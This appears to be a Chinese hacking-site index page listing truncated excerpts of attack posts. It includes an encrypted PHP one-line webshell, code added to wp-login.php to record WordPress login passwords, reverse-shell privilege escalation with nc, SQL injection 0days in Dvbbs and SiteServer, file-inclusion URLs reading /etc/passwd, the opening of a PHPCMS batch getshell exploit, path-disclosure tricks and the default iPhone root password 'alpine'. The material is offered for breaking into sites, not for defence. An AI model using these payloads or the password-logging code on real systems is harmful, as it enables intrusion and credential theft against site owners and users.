加密一句话木马
我原也以为这是ASCII码加密过的 73,50,114,133,114,112,130,129,114,45,127,114,126,130,114,128,129,53,47,121,47,54,50,75结果T00LS某牛 全部数字减13,然后十进制解密 <script> var sun=[73,50,114,133,114,112,130,129,114,45,127...
webshell下记录WordPress登陆密码
webshell下记录Wordpress登陆密码方便进一步社工 原处:http://81sec.com/read.php?115 Wordpress的密码破解可以说基本是没招了,悲剧只好采用记录密码了。 在文件wp-login.php中539行处添加: // log password $log_user=$_POST['log']; $log_pwd=$_POST['p...
一次LINUX低权限提权法
今天旁站拿到一个Apache/2.2.3 (CentOS)的SHELL,进去是LINUX系统,PHP版本5.2.17,MYSSQL的环境,没ASP,.NET组建 先用自带的命令LS,UNAME了下,无显,肯定是设置了PHP.INI。 根目录无写权限,估计就算反弹了也没法CHMOD 777了 先反弹试试 tmp里创建好文件,SHELL目录传马,执行,本地NC监听上线,WHOAMI一下,是WWWROO...
Dvbbs8.2 sql 版login.asp远程sql注入漏洞
今日在学PHP的时候,一个朋友给我发来一个站,让帮忙做个安检,发现站有个论坛是dvbbs的,呵呵,这可是个漏洞不断的家伙啊。。 最新版本的又暴了远程SQL注入漏洞! 下面提供该漏洞的分析及利用! 【漏洞描述】中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp 【漏洞分析】Login.asp 程序在检查隐藏...
php伪造本地文件包含漏洞
代码: <?php $page=$_GET[page]; include($page.'php'); ?> 你可以这样使用 https://www.webshell.cc/index.php?page=../etc/passwd https://www.webshell.cc/index.php?page=../../../etc/passwd http://w...
phpcms 2008最新0day加批量EXP
玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为c EXP: #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ PHPCMS Remote Code Inject GetShell Exploit ...
PHP爆绝对路径方法总结帖
1、单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg: https://www.webshell.cc/news.php?id=149' 截图: 2、错误参数值爆路径 说明: 将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。 Eg: https://www.webshell.cc/resea...
ecshop的48个泄露网站路径漏洞
https://www.webshell.cc/shop/api/cron.php https://www.webshell.cc/shop/wap/goods.php https://www.webshell.cc/shop/temp/compiled/ur_here.lbi.php https://www.webshell.cc/shop/temp/compiled/pages.lbi.php htt...
默认口令可能导致 iPhone 用户信息泄露
iPhone 的root默认口令已经不是秘密,随便GOOGLE一下就可以知道Root和mobile帐号密码就是:alpine 国内绝大多数用户购买了IPHONE后,第一时间就是贴膜,接着就是越狱了吧,越狱是为了能使用更多的应用程序、游戏、娱乐等等功能。 有一些应用程序如果需要使用,前提就要安装一些资源包,可以使用IPHONE里的CYDIA下载安装。 比如用户需要在IPHONE使用命令行,或其他相...
SiteServer 3.4.4最新SQL注入0day
这几天在看一个站的时候发现了这个CMS,网上公布了一些漏洞,没说明具体版本, 但在我在3.4.4上实际测试的时候发现是无效的,为此专门去官网下了一份最新版, 看了一下,发现了一些很搞笑的问题。简介siteserver:本文测试的版本是: SiteServer系列产品最新版本: 3.4.4 正式版 (2011年7月18日发布) 下载地址:http://www.siteserver.cn/downlo...